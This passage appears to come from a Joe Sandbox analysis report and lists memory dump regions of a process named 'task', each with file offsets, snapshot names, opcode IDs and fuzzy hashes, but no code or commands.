                                                      • Instruction Fuzzy Hash: F9F0AF75D18A1DDBFB94EF9884492BCB7A2EF95304B508136D00EE7686CE28D8068BC0
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 766580d4feb464578d20b0034fa9ec03233fec4e31c60993017830f1d7a3576f
                                                      • Instruction ID: b4478ff81793d17b18bbb29774f13f2fda1476ac9c6dcd754a5d2bf384a6caf8
                                                      • Opcode Fuzzy Hash: 766580d4feb464578d20b0034fa9ec03233fec4e31c60993017830f1d7a3576f
                                                      • Instruction Fuzzy Hash: 63F02B32B486158FD30D9B2084762747382EBA2718720D27EC89B872E3DC24A81B49C8
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 122e897f0ed47e599d82af79135a517de34fad068588e3a6b2545bf460bf2b87
                                                      • Instruction ID: 0cd14fe1385ab9d7e6dd40496cbd8ba045f0cc306a849798fe1570ed450c2bfd
                                                      • Opcode Fuzzy Hash: 122e897f0ed47e599d82af79135a517de34fad068588e3a6b2545bf460bf2b87
                                                      • Instruction Fuzzy Hash: BBF04F71E0854EDFEB05DF94C4445EEBBB1EF85325F208166D00AA7258DA38A9568B84
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be4a66ea9f259d72b76b820c8051b312cecaadb00537cef01e34ef684740057e
                                                      • Instruction ID: 8c50f74b82f7d3bd84ff0e5a6fcccf3d97e86569a1c132775053912505dce810
                                                      • Opcode Fuzzy Hash: be4a66ea9f259d72b76b820c8051b312cecaadb00537cef01e34ef684740057e
                                                      • Instruction Fuzzy Hash: B2F0A0317182028BE70DAA3C8E4A2E5339797D4311725C23AE407CB6E9DC38D94A8380
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C2000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c2000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 241eb7c153b3d852fa0f9c8bba7432d3511245b67d3356586b416b8fead6e2bc
                                                      • Instruction ID: 0d6f30fe9fe1dab0ab75255929a0d30320dd6f8756bf557d1f64f7efbfa0805c
                                                      • Opcode Fuzzy Hash: 241eb7c153b3d852fa0f9c8bba7432d3511245b67d3356586b416b8fead6e2bc
                                                      • Instruction Fuzzy Hash: 14F05EB251964E8FEBB4EF34C840BFC3356FF89304F1189B5940D8A285DE79A9859740
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66da8943a7d24914d46aba52a1087663bfe9495811dc1f5cc3f50a7cd7a45ed6
                                                      • Instruction ID: 67261cb25a694e206f435490abdd2b9effc40334b9f4914fb3c1aa66ef6d98ce
                                                      • Opcode Fuzzy Hash: 66da8943a7d24914d46aba52a1087663bfe9495811dc1f5cc3f50a7cd7a45ed6
                                                      • Instruction Fuzzy Hash: 49F03070E0464ECBEB04DFD0C4495BEBBB2EF95314F60C166C009AB688CA38E945CB94
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eedc0d05ea70509fc1a3664c88415c4160801d6ad76f39e37037805abe2ca424
                                                      • Instruction ID: 7ed2faf792e70e8776ada64df4cec4a08a468b1d6b2881a0dacea1dace21fe85
                                                      • Opcode Fuzzy Hash: eedc0d05ea70509fc1a3664c88415c4160801d6ad76f39e37037805abe2ca424
                                                      • Instruction Fuzzy Hash: 5AE0DFAAA1A243CBF25A273090BA2A523A19B27208B0598B5D44E4328ACC1EAC1606D4
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8b778a61ca948ba511a22c59e34d32a2a227d822592e0ad729fb01b6f0b0579
                                                      • Instruction ID: ede9cdb5da0fa9b82177b69b42b10e04923c5c105f94e2258ed424d3c19be6b5
                                                      • Opcode Fuzzy Hash: d8b778a61ca948ba511a22c59e34d32a2a227d822592e0ad729fb01b6f0b0579
                                                      • Instruction Fuzzy Hash: 0FD0C9A3B8D6191A754C656C78070FC63C1C783134690513FD54B81AA7EC1F685301CD
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2993b3ceee3eff4bc814d09571596d1ad01c451eefd81970a5cc96a424a401d0
                                                      • Instruction ID: 6328de8285d4a81e4aba04a7518d40353a99f0024b9c5f2a7df0c080bdd1f2de
                                                      • Opcode Fuzzy Hash: 2993b3ceee3eff4bc814d09571596d1ad01c451eefd81970a5cc96a424a401d0
                                                      • Instruction Fuzzy Hash: C1D01215E4D60A9BFF45FBB440092FD51A25F95304B90C93A901ED7186DC3C94044784
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e1eb7f4371ed8cffef164ce40eeeabc8097a28a721d3ac189b4dc084e3ace8b
                                                      • Instruction ID: 1772713730efe32ba4290f59ade29554bbb8a4b1da0ff577bd0d3b4a74a3cc7b
                                                      • Opcode Fuzzy Hash: 5e1eb7f4371ed8cffef164ce40eeeabc8097a28a721d3ac189b4dc084e3ace8b
                                                      • Instruction Fuzzy Hash: 9ED0A723D0D5628BB51E619410692BC4D40DB52A18B15C17FE90F632E2DC085D150ADE
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c6000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97c256d016cc8b16d40fb23455df81a87d779b90347c28252b4324d7132807ab
                                                      • Instruction ID: 80519e15799200b636bdf5292304f1dae48d83cf0ac7e333727b3f6daa1ac9d7
                                                      • Opcode Fuzzy Hash: 97c256d016cc8b16d40fb23455df81a87d779b90347c28252b4324d7132807ab
                                                      • Instruction Fuzzy Hash: 6CD012309191098FF71DEF64C0428DC7731FB45618F30666DD04B662A2D935A9058A88
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d82b66094ac72fb2d7b8d6e03b5c73d0e767979114d0d87d89550be26084b4bf
                                                      • Instruction ID: b61567e5b0646fb5799785fd46bcef827fa9be237433ac21b6da1a77e778fcc7
                                                      • Opcode Fuzzy Hash: d82b66094ac72fb2d7b8d6e03b5c73d0e767979114d0d87d89550be26084b4bf
                                                      • Instruction Fuzzy Hash: 94D0A760F1820687FAD07BEC844967E17B1EF42304B909533D00E9B689DD38E8050B84
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 758d5e367591b9d865147fbce0c14f6f8995bbe04a866ffcebf81526d42d00d1
                                                      • Instruction ID: 62a3d99a1173636e8d8701cffe00c10300a4018477866f1a901183191a5052b6
                                                      • Opcode Fuzzy Hash: 758d5e367591b9d865147fbce0c14f6f8995bbe04a866ffcebf81526d42d00d1
                                                      • Instruction Fuzzy Hash: E1D0A762E0920A8BF651BF6C40592FC1791DB67218B54D032D01EB7385CE2CEC050BE4
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e6fedef0171dfde4ba7e027f17902415657a7a29ef373bb8b6001a1065e8032c
                                                      • Instruction ID: df6a2c6e7e50d5b59230cb4a644addeedbf731a6678f47e27c59a8e054549f14
                                                      • Opcode Fuzzy Hash: e6fedef0171dfde4ba7e027f17902415657a7a29ef373bb8b6001a1065e8032c
                                                      • Instruction Fuzzy Hash: CFC08CE0E1C30A8BF781AF34809836E2A606B8A208F204038D009A6288CEBC6A100380
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7606a0fc62e4e54d8f335c09ac0a4515144289118147727eb48096dbbd6e281a
                                                      • Instruction ID: 0a880604c8904fa9e2819539826a57fc054a1b4e4501e4b9aaae843c44c12088
                                                      • Opcode Fuzzy Hash: 7606a0fc62e4e54d8f335c09ac0a4515144289118147727eb48096dbbd6e281a
                                                      • Instruction Fuzzy Hash: 98C09B3041D34787E77EDF1485577A4765DF705D08F30A01D998B0D1754A305311DA95